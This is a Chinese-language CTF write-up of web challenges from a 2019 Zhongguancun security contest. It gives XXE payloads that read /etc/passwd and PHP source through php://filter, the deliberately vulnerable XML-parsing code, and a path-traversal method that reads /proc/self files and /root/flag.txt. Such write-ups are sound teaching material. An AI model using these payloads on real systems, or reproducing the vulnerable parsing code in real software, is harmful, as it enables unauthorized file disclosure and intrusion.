中关村第三届新兴领域专题赛网络与信息安全领域专项赛Web WP
2019-08-15 本文已影响0人
Cyc1e
0x01 Game
这题迷得很,查看下一下js,按着ajax发送请求得条件自己发一个请求就好了
payload:
/socre.php
POST:score=15
0x02 who_are_you
XXE的题目,没有任何限制,直接任意文件读取......
<?xml version="1.0"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<name>&xxe;</name>
</root>
可以读到passwd的信息,所以主要就是找到flag就好了,最后是在index.php里找到了flag,由于php文件里有<等特殊字符,所以利用file协议读的时候会出现解析错误导致没有回显,所以换一个编码的协议读就好了比如php://filter
<?xml version="1.0"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY>
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php" >]>
<root>
<name>&xxe;</name>
</root>
index.php源码
<?php
libxml_disable_entity_loader(false);
$data = @file_get_contents('php://input');
$resp = '';
//$flag='flag{1900cb98-96c4-45ac-a22e-86da06d59a3e}';
if($data != false){
$dom = new DOMDocument();
$dom->loadXML($data, LIBXML_NOENT);
ob_start();
$res = $dom->textContent;
$resp = ob_get_contents();
ob_end_clean();
if ($res){
die($res);
}
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>welcome</title>
<link rel="stylesheet" href="./style.css">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
</head>
<body class="contactBody">
<div class="wrapper">
<div class="title">
</div>
<form method="post" class="form">
<h1 id="title">请输入姓名</h1>
<br/>
<br/>
<br/>
<input type="text" class="name entry " id="name" name="name" placeholder="Your Name"/>
</form>
<button class="submit entry" onclick="func()">Submit</button>
<div class="shadow"></div>
</div>
</body>
</html>
<script type="text/javascript">
function play() {
return false;
}
function func() {
// document.getElementById().value
var xml = '' +
'<\?xml version="1.0" encoding="UTF-8"\?>' +
'<feedback>' +
'<author>' + document.getElementById('name').value+ '</author>' +
'</feedback>';
console.log(xml);
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function () {
if (xmlhttp.readyState == 4) {
// console.log(xmlhttp.readyState);
// console.log(xmlhttp.responseText);
var res = xmlhttp.responseText;
document.getElementById('title').textContent = res
}
};
xmlhttp.open("POST", "index.php", true);
xmlhttp.send(xml);
return false;
};
</script>
</body>
</html>
0x03 show_me_your_image
主要思路就是上传文件,上传文件后。文件名会被编码,多测几次就可以发现是一个变表的base64编码,base64编码是固定3个字符编码为固定的4个字符,题目的还有一个点就是任意文件读取,name参数后跟任意文件的变表编码的值,所以根据上传的文件名进获取对应的编码,所以上传的文件名需要构造,文件名的长度需要是3的倍数才能确定最后的文件名,并且随便输入的报错信息不是apache+php的,最后才确定是一个Flask模拟的php,骗人用的~~~
所以现在讲下具体操作步骤:
(1) 设置要读的文件(比如要读的是passwd文件),设置上传的文件名为'../.././/etc/passwd'(测试可以发现是2层目录,长度要是3的倍数)
(2)分段进行上传,收集各段的编码后的字符进行拼接,比如axb8axb8axnVSml8jmNBjUS9
(3)访问img.php?name=[文件编码后的编码]就可以读取到相应的文件
所以接下来就是找flag的路径,由于我们不知道各个文件的路径,所以用/proc/self/来仅需读取
../../././proc/self/cmdline #可以读到当前服务为app.py
#python3 app.py sleep 36000
../..//proc/self/cwd/app.py #可以读到本题的源码
#####################################
import os
from urllib import parse
from base64 import b64decode, b64encode
from utils import r_encode, r_decode, read_file
from flask import render_template, Response
from flask import Flask, session, redirect, request
from werkzeug.utils import secure_filename
app = Flask(__name__)
app.config['SECRET_KEY'] = os.urandom(24)
UPLOAD_FOLDER = '/tmp/uploads/'
ALLOWED_EXTENSIONS = {'png', 'jpg', 'jpeg', 'gif'}
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS
@app.route('/')
@app.route('/index.php')
def home():
file = session.get('file')
if file:
file = bytes.decode(file)
file = parse.quote(file)
return render_template('index.html', file=file)
@app.route('/upload.php', methods=['POST'])
def upload():
if request.method == 'POST':
file = request.files['file']
if file and allowed_file(file.filename):
if not os.path.exists(app.config['UPLOAD_FOLDER']):
os.makedirs(app.config['UPLOAD_FOLDER'])
filename = secure_filename(file.filename)
file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
else:
return "不允许的格式"
session['file'] = r_encode(b64encode(str.encode(file.filename)))
return redirect('/')
@app.route('/img.php', methods=['GET'])
def img():
file = request.args.get("name")
file = r_decode(str.encode(file))
file = b64decode(file)
file = UPLOAD_FOLDER + bytes.decode(file)
image = read_file(file)
return Response(image, mimetype="image/jpeg")
if __name__ == '__main__':
app.run(
host = '0.0.0.0',
port = 80,
)
../../././proc/self/cwd/templates/upload.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Title</title>
</head>
<body>
<form action="upload.php" method="post" enctype="multipart/form-data">
<table>
<tr>
<td>
上传图片
</td>
<td>
<input type="file" name="file">
</td>
</tr>
</table>
<input type="submit" value="上传">
</form>
{% if file %}
<img src="img.php?name={{ file }}">
{% else %}
请上传一张图片
{% endif %}
</body>
</html>
<!-- flag in /root/flag.txt ! Get it ! -->
所以flag在/root/flag.txt下了最后利用
../.././proc/self/root/root/flag.txt #读flag
0x04 按F注入
fbctf2019题目的修改题,目前只做到了回显数据库信息,还没读到flag,等复现完再写
参考:https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md
